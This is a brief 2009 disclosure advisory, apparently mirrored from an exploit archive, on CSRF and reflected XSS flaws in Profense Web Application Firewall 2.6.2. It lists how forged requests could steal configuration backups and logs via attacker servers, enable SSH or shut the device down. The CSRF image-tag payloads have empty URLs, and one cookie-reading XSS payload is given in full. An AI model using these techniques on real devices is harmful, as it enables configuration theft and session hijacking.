Profense Web Application Firewall 2.6.2 - CSRF/XSS Vulnerabilities

ID SSV:66247
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                Written By Michael Brooks
Special thanks to str0ke!

Affects: Profense Web Application Firewall XSRF and XSS
Version: 2.6.2

"Defenses against all OWASP Top Ten vulnerabilities"
 Too bad it doesn't defend its self against all of these vulnerabilities....

Chaning configuration:
DNS, SMTP,  NTP servers.
Set a (malcious) remote FTP server or SCP server to backup (steal)
configuration files.   This could be used to steal the configuraitons.
Set a remote syslog server to steal the logs
Enable SSH
Enable SNMP
<img src=>
Apply new configurations:
<img src=>

Add a proxy:
<img src=>

Turn off the Proface machine:
<img src=>

Force the Proface server to ping:
<img src=>
Could be used to nofiy the attacker that the attack succeeded.

reflective xss:>"<script>alert(document.cookie)</script>

# [2009-01-29]